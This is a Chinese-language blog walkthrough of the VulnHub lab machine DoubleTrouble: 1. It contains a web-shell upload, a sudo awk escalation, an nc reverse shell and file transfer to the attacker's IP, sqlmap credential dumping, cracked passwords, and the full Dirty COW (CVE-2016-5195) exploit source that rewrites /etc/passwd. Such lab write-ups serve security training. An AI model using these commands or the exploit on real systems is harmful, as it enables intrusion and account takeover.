banner
Ryougi

Ryougi

ttttt
github
bilibili
steam
follow
主页图文作品集归档关于我

DOUBLETROUBLE提权

#DOUBLETROUBLE#提权24
AI 生成的摘要
靶机下载的过程包括以下步骤: 1. **信息收集**: - 使用 `netdiscover` 扫描 IP 段,发现靶机 IP 为 192.168.23.136。 - 使用 `nmap` 扫描端口,发现开放端口 22 和 80。 - 访问主页,发现使用 qdPM 版本 9.1,存在 RCE 和 SQL 注入漏洞。 - 使用 `dirb` 扫描目录,发现 `secret` 目录下有图片 `doubletrouble.jpg`。 - 使用 `stegseek` 进行爆破,成功获取到账户密码。 2. **渗透**: - 登录系统后,上传一句话木马文件,访问上传路径 `/uploads/users/`。 - 使用蚁剑连接,尝试提权。 - 发现可以使用 `awk` 命令提权,运行 `sudo awk 'BEGIN {system("/bin/bash")}'`。 - 使用 `nc` 反弹 shell 提权,并调用本地终端操作。 - 使用 `nc` 传递文件,获取第二个账户的 SSH 登录权限以获取第一个 flag。 - 继续提权,查找内核版本,发现存在脏牛提权漏洞(CVE-2016-5195)。 - 使用 `dirty.c` 脚本进行提权,修改用户信息并备份 `/etc/passwd` 文件。 整个过程展示了从信息收集到渗透和提权的完整步骤。

靶机下载:doubletrouble: 1

前置#

靶机网络 NAT 模式
如果在扫描 IP 段时无法探测靶机 IP,参考这篇文章:
vulnhub 靶机检测不到 IP 地址解决办法

1. 信息收集
使用 netdiscover 扫描 IP 段

netdiscover  -r 192.168.23.0/24

发现 IP:192.168.23.136

image

nmap 扫描端口

nmap -p- 192.168.23.136

开放端口 22,80

image

访问主页

3

发现使用 qdPM 版本 9.1,可以从exploit-db上查到存在 RCE、sql 注入等漏洞

dirb 扫描目录

dirb http://192.168.23.136/

发现 secret 目录下有图片 doubletrouble.jpg
image
使用 stegseek 爆破
字典使用 kali 自带的 rockyou.txt,位于 /usr/share/wordlists/rockyou.txt.gz,解压后使用

kali 尝试多次安装 stegseek 不成功,换成 docker 执行,具体可以参考Stegseek,需先在 windows 上安装 docker desktop

docker run --rm -it -v "$(pwd):/steg" rickdejager/stegseek [stegofile.jpg] [wordlist.txt]

这条命令在 windows cmd 中无法直接执行,换成完整路径

docker run --rm -v "C:\Users\Mikiya\Desktop:/steg" rickdejager/stegseek /steg/doubletrouble.jpg /steg/rockyou.txt

这里 C:\Users\Mikiya\Desktop 是我两个文件存放的位置,也就是图片和字典,使用记事本打开输出文件得到账户密码

otisrush@localhost.com
otis666

image
2. 渗透
登录系统,在我的详情发现利用点,上传一句话木马文件,访问上传路径 /uploads/users/

image

image
使用蚁剑连接

image
提权

image

发现 awk 命令可以使用 sudo 运行
sudo awk 'BEGIN {system ("/bin/bash")}' 提权

蚁剑无法直接提权,可以使用 nc 反弹 shell 提权
kali 监听端口:nc -nvlp 9999
蚁剑运行:nc -e /bin/bash 192.168.23.134 9999
提权命令
image
调用本地终端操作更方便

python3 -c 'import pty;pty.spawn("/bin/bash")'

在根目录下发现还有个虚拟机

image
使用 nc 传递文件
kali 终端:nc -lvvp 8888 > doubletrouble.ova
靶机终端:nc 192.168.23.134 8888 < doubletrouble.ova
VM 导入靶机,探测主机 IP,开放端口 22,80
image
image
访问 80 端口

image
直接用 sqlmap 跑

sqlmap -u http://192.168.23.137/index.php -forms --dbs --batch

发现两个数据库

image
依次获取表名和数据

sqlmap -u "http://192.168.23.137/index.php" \
--data="uname=AqUH&psw=Kgjz&btnLogin=Login" \
--dbms=mysql \
--tables -D doubletrouble \
--batch

sqlmap -u "http://192.168.23.137/index.php" \
--data="uname=AqUH&psw=Kgjz&btnLogin=Login" \
--dbms=mysql \
--batch \
--dump -D doubletrouble -T users

得到如下信息

GfsZxc1,montreux
ZubZub99,clapton

使用第二个账户 ssh 登录获取第一个 flag

image
由于是普通权限继续提权,查内核版本

image

存在脏牛提权漏洞
脏牛 (DirtyCow) Linux 本地提权漏洞复现 (CVE-2016-5195)

用 dirty.c 脚本提权dirty.c

//
// This exploit uses the pokemon exploit of the dirtycow vulnerability
// as a base and automatically generates a new passwd line.
// The user will be prompted for the new password when the binary is run.
// The original /etc/passwd file is then backed up to /tmp/passwd.bak
// and overwrites the root account with the generated line.
// After running the exploit you should be able to login with the newly
// created user.
//
// To use this exploit modify the user values according to your needs.
//   The default is "firefart".
//
// Original exploit (dirtycow's ptrace_pokedata "pokemon" method):
//   https://github.com/dirtycow/dirtycow.github.io/blob/master/pokemon.c
//
// Compile with:
//   gcc -pthread dirty.c -o dirty -lcrypt
//
// Then run the newly create binary by either doing:
//   "./dirty" or "./dirty my-new-password"
//
// Afterwards, you can either "su firefart" or "ssh firefart@..."
//
// DON'T FORGET TO RESTORE YOUR /etc/passwd AFTER RUNNING THE EXPLOIT!
//   mv /tmp/passwd.bak /etc/passwd
//
// Exploit adopted by Christian "FireFart" Mehlmauer
// https://firefart.at
//

#include <fcntl.h>
#include <pthread.h>
#include <string.h>
#include <stdio.h>
#include <stdint.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/wait.h>
#include <sys/ptrace.h>
#include <stdlib.h>
#include <unistd.h>
#include <crypt.h>

const char *filename = "/etc/passwd";
const char *backup_filename = "/tmp/passwd.bak";
const char *salt = "firefart";

int f;
void *map;
pid_t pid;
pthread_t pth;
struct stat st;

struct Userinfo {
   char *username;
   char *hash;
   int user_id;
   int group_id;
   char *info;
   char *home_dir;
   char *shell;
};

char *generate_password_hash(char *plaintext_pw) {
  return crypt(plaintext_pw, salt);
}

char *generate_passwd_line(struct Userinfo u) {
  const char *format = "%s:%s:%d:%d:%s:%s:%s\n";
  int size = snprintf(NULL, 0, format, u.username, u.hash,
    u.user_id, u.group_id, u.info, u.home_dir, u.shell);
  char *ret = malloc(size + 1);
  sprintf(ret, format, u.username, u.hash, u.user_id,
    u.group_id, u.info, u.home_dir, u.shell);
  return ret;
}

void *madviseThread(void *arg) {
  int i, c = 0;
  for(i = 0; i < 200000000; i++) {
    c += madvise(map, 100, MADV_DONTNEED);
  }
  printf("madvise %d\n\n", c);
}

int copy_file(const char *from, const char *to) {
  // check if target file already exists
  if(access(to, F_OK) != -1) {
    printf("File %s already exists! Please delete it and run again\n",
      to);
    return -1;
  }

  char ch;
  FILE *source, *target;

  source = fopen(from, "r");
  if(source == NULL) {
    return -1;
  }
  target = fopen(to, "w");
  if(target == NULL) {
     fclose(source);
     return -1;
  }

  while((ch = fgetc(source)) != EOF) {
     fputc(ch, target);
   }

  printf("%s successfully backed up to %s\n",
    from, to);

  fclose(source);
  fclose(target);

  return 0;
}

int main(int argc, char *argv[])
{
  // backup file
  int ret = copy_file(filename, backup_filename);
  if (ret != 0) {
    exit(ret);
  }

  struct Userinfo user;
  // set values, change as needed
  user.username = "firefart";
  user.user_id = 0;
  user.group_id = 0;
  user.info = "pwned";
  user.home_dir = "/root";
  user.shell = "/bin/bash";

  char *plaintext_pw;

  if (argc >= 2) {
    plaintext_pw = argv[1];
    printf("Please enter the new password: %s\n", plaintext_pw);
  } else {
    plaintext_pw = getpass("Please enter the new password: ");
  }

  user.hash = generate_password_hash(plaintext_pw);
  char *complete_passwd_line = generate_passwd_line(user);
  printf("Complete line:\n%s\n", complete_passwd_line);

  f = open(filename, O_RDONLY);
  fstat(f, &st);
  map = mmap(NULL,
             st.st_size + sizeof(long),
             PROT_READ,
             MAP_PRIVATE,
             f,
             0);
  printf("mmap: %lx\n",(unsigned long)map);
  pid = fork();
  if(pid) {
    waitpid(pid, NULL, 0);
    int u, i, o, c = 0;
    int l=strlen(complete_passwd_line);
    for(i = 0; i < 10000/l; i++) {
      for(o = 0; o < l; o++) {
        for(u = 0; u < 10000; u++) {
          c += ptrace(PTRACE_POKETEXT,
                      pid,
                      map + o,
                      *((long*)(complete_passwd_line + o)));
        }
      }
    }
    printf("ptrace %d\n",c);
  }
  else {
    pthread_create(&pth,
                   NULL,
                   madviseThread,
                   NULL);
    ptrace(PTRACE_TRACEME);
    kill(getpid(), SIGSTOP);
    pthread_join(pth,NULL);
  }

  printf("Done! Check %s to see if the new user was created.\n", filename);
  printf("You can log in with the username '%s' and the password '%s'.\n\n",
    user.username, plaintext_pw);
    printf("\nDON'T FORGET TO RESTORE! $ mv %s %s\n",
    backup_filename, filename);
  return 0;
}

kali 创建一个 http 服务器

python -m http.server 80

靶机使用 wget 命令

wget http://192.168.23.130/dirty.c

image
按照作者提示使用 gcc 提权

gcc -pthread dirty.c -o dirty -lcrypt

./dirty

image
成功获取 root,在 root 目录中找到第二个 flag

image

总结#

使用工具:nmap 扫描 IP 端口、dirb 扫描目录、stegseek 爆破图片、nc 传文件、蚁剑、sqlmap 爆破数据库、脚本提权

sudo awk 'BEGIN {system ("/bin/bash")}' 提权

本篇文章解题过程来自DOUBLETROUBLE: 1vulnhub 靶机 --DoubleTrouble

加载中...
此文章数据所有权由区块链加密技术和智能合约保障仅归创作者所有。